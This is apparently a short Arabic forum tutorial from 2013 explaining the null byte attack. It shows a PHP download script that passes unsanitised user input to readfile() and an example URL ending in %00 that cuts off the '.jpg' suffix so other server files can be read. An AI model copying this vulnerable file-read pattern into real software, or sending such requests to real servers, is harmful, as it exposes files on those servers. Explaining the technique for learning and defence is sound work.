السلام عليكم ورحمة الله تعالى وبركاته.
المهم... بالنسبه للمطلعين على البرمجه في السي ..
Null Byte = '\0'
وهو يكون في نهاية مصفوفات الحروف
مثلا :
كود PHP:
char C[]="nor15din";
في الذاكرة يتم تسجيل اسمي على الشكل التالي :
كود PHP:
'n' 'o' 'r' '1' '5' 'd' 'i' 'n' '\0'
وبالتالي \0 ترمز الى نهاية المصفوفة ...
سنتطرق الى هذه الدروس في دورة السي، المهم 
نفترض عندنا سكربت يمكن من تحميل الصور فقط من السيرفر..
كود PHP:
readfile($_GET["image"] . ".jpg");
الاستغلال :
كود PHP:
http://www.site.com/download.php?image=file.txt%00
ينفذ الامر هكذا في السيرفر :
كود PHP:
readfile("file.txt\0.jpg");
والسلام عليكم.. 
Null Byte Attack
11-28-2013, 12:07 AM
Null Byte Attack 
العرض الشجري
